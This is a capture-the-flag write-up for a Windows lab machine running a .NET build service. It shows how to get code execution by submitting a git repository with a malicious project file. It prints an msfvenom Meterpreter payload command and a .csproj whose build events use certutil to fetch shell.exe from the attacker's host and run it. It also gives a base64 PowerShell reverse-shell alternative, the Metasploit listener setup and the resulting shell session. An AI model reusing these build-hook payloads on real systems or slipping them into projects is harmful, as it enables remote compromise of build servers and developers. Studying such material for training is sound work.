This box starts off with a web application that offers dotnet building services.
Reconnaissance
Nothing special in the nmap scan.
1
2
3
4
5
6
7
8
9
10
11
# Nmap 7.93 scan initiated Wed Oct 4 17:07:47 2023 as: nmap -sC -sV -oN nmap_result 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.024s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 4 17:08:12 2023 -- 1 IP address (1 host up) scanned in 24.60 seconds
We can provide a URL to a .git folder to build a .NET project.
Foothold
We can create a .NET project that uses the prebuild and postbuild events to execute commands and to run a reverse shell.
Setup .NET project to build
1
2
3
4
5
6
7
8
9
$ mkdir exploit
$ cd exploit
$ dotnet new sln -o Repo
cThe template "Solution File" was created successfully.
$ cd Repo
$ dotnet new console -o Repo.ConsoleApp --framework net6.0 --force
The template "Console App" was created successfully.
$ dotnet sln Repo.sln add Repo.ConsoleApp/Repo.ConsoleApp.csproj
Project `Repo.ConsoleApp/Repo.ConsoleApp.csproj` added to the solution.
We now have a default .NET project that we can use to perform RCE on the server.
Create Reverse Shell
MSFVenom shell
We will use msfvenom to create the shell we will drop and execute on the server. We spin up a server that runs on port 8000 to serve this exe.
1
2
3
4
5
6
7
8
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.109 LPORT=1234 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
We can now edit our .csproj file to download and execute the exe upon the build events. We will use certutil to download the shell to the %temp% directory and execute it “PostBuild”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ pwd
../visual/exploit/Repo/Repo.ConsoleApp
$ vi Repo.ConsoleApp.csproj
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
<Exec Command="certutil -urlcache -f http://10.10.14.110:8000/shell.exe %temp%/shell.exe" />
</Target>
<Target Name="PostBuild" AfterTargets="PostBuildEvent">
<Exec Command="start %temp%/shell.exe" />
</Target>
Powershell shell
This is an alternative option I didn’t use as it wasn’t stable for me, but I heard other had success with this method.
It is essentially generating a base64 encoded reverse shell powershell command and then letting it execute on the “PreBuild” event. In this example, we use a python script to generate this found located on Github.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ python3 mkpsrevshell.py 10.10.14.110 1234
powershell -e JABjAG**BASE64_OUTPUT**oACkA
$ vi Repo.ConsoleApp.csproj
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
<Exec Command="powershell -e JABjAG**BASE64_OUTPUT**oACkA" />
</Target>
Setup local git server
As this box doesn’t have internet acceess, we will need to setup a local git server by serving a git repo over http or by using gitea.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ cd ctf/htb/visual
─$ ls
exploit failed mkpsrevshell.py nmap_result repo-http
$ cd exploit
$ cd Repo
─$ ls
Repo.ConsoleApp Repo.sln shell.exe
$ git init
Initialized empty Git repository in /home/kali/ctf/htb/visual/exploit/Repo/.git/
$ git add .
$ git commit -m "Repo"
[master (root-commit) 3d6d454] Repo
9 files changed, 225 insertions(+)
create mode 100644 Repo.ConsoleApp/Program.cs
create mode 100644 Repo.ConsoleApp/Repo.ConsoleApp.csproj
create mode 100644 Repo.ConsoleApp/obj/Repo.ConsoleApp.csproj.nuget.dgspec.json
create mode 100644 Repo.ConsoleApp/obj/Repo.ConsoleApp.csproj.nuget.g.props
create mode 100644 Repo.ConsoleApp/obj/Repo.ConsoleApp.csproj.nuget.g.targets
create mode 100644 Repo.ConsoleApp/obj/project.assets.json
create mode 100644 Repo.ConsoleApp/obj/project.nuget.cache
create mode 100644 Repo.sln
create mode 100644 shell.exe
$ cd .git
$ git --bare update-server-info
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Running the metasploit listener
We set up our metasploit listener.
1
2
3
4
5
6
7
8
9
10
11
12
13
$ msfconsole
msf6 > use mullti/handler
[-] No results from search
[-] Failed to load module: mullti/handler
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > run
Now that everything is setup, we can submit our URL to our .git folder server on port 80 to the application and turn on our listener.
When the build has started we start to see requests coming in to our servers:
Port 80 (.git)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /HEAD HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/3d/6d454053bf65be73f3f17f2e2ffb4a4ef319be HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/c3/4d11642c16c3983f09741d38ad57ee6f04f106 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/b9/7f857d23fd696fefa3ff9eef4a63edcf08d9a6 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/7d/41a2ac5addb46f980ebb809e2a3ea03d9e6d68 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/47/cd2151e2328faf0ad5c24a862bbae197e035c4 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/61/59ea4ea5dc0c1c0ef437b2c8da4be4203d0bef HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/2c/31619edaa2b2f8de1a35581dbcfdc750b66611 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/83/fa4f4d5fd1f545f64172b044a07814db23104f HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/a1/ecbc14179bd62ea673d595b2a721ef088a2f89 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/48/4c1427d2414ef36a2c10b1dfb7a8997a0dceb6 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/3d/c06ef3cc4057524bf5d2cd49936dff789cebe8 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/3a/890c6e312332a3523ce5a21525e117c98d4289 HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:02:30] "GET /objects/d5/44b9dae0e0cd28963f7ba3e52bba7dcaef26b9 HTTP/1.1" 200 -
Port 8000 (shell.exe)
1
2
3
4
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.234 - - [05/Oct/2023 17:03:03] "GET /shell.exe HTTP/1.1" 200 -
10.10.11.234 - - [05/Oct/2023 17:03:03] "GET /shell.exe HTTP/1.1" 200 -
Metasploit Listener
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[*] Started reverse TCP handler on 10.10.14.109:1234
[*] Sending stage (200774 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.109:1234 -> 10.10.11.234:49742) at 2023-10-05 17:03:09 +0200
meterpreter > shell
Process 4312 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\Temp\062daf416765efc93f6370dc736374\Repo.ConsoleApp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 82EF-5600
Directory of C:\Windows\Temp\062daf416765efc93f6370dc736374\Repo.ConsoleApp
10/05/2023 08:02 AM <DIR> .
10/05/2023 08:02 AM <DIR> ..
10/05/2023 08:02 AM <DIR> obj
10/05/2023 08:02 AM 105 Program.cs
10/05/2023 08:02 AM 515 Repo.ConsoleApp.csproj
2 File(s) 620 bytes
3 Dir(s) 9,043,091,456 bytes free
C:\Windows\Temp\062daf416765efc93f6370dc736374\Repo.ConsoleApp>cd C:\Users\
cd C:\Users\
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 82EF-5600
Directory of C:\Users
06/10/2023 10:59 AM <DIR> .
06/10/2023 10:59 AM <DIR> ..
09/12/2023 02:02 AM <DIR> Administrator
09/12/2023 02:27 AM <DIR> enox
10/05/2023 07:55 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 9,043,767,296 bytes free
C:\Users>cd enox
cd enox
C:\Users\enox>dir
dir
Volume in drive C has no label.
Volume Serial Number is 82EF-5600
Directory of C:\Users\enox
09/12/2023 02:27 AM <DIR> .
09/12/2023 02:27 AM <DIR> ..
06/10/2023 01:10 PM <DIR> Desktop
06/10/2023 11:00 AM <DIR> Documents
09/15/2018 12:19 AM <DIR> Downloads
09/15/2018 12:19 AM <DIR> Favorites
09/15/2018 12:19 AM <DIR> Links
09/15/2018 12:19 AM <DIR> Music
09/15/2018 12:19 AM <DIR> Pictures
09/15/2018 12:19 AM <DIR> Saved Games
09/15/2018 12:19 AM <DIR> Videos
0 File(s) 0 bytes
11 Dir(s) 9,043,767,296 bytes free
C:\Users\enox>cd Desktop
cd Desktop
C:\Users\enox\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 82EF-5600
Directory of C:\Users\enox\Desktop
06/10/2023 01:10 PM <DIR> .
06/10/2023 01:10 PM <DIR> ..
10/05/2023 07:51 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 9,042,903,040 bytes free
C:\Users\enox\Desktop>type user.txt
type user.txt
298c3**REDACTED**a15e6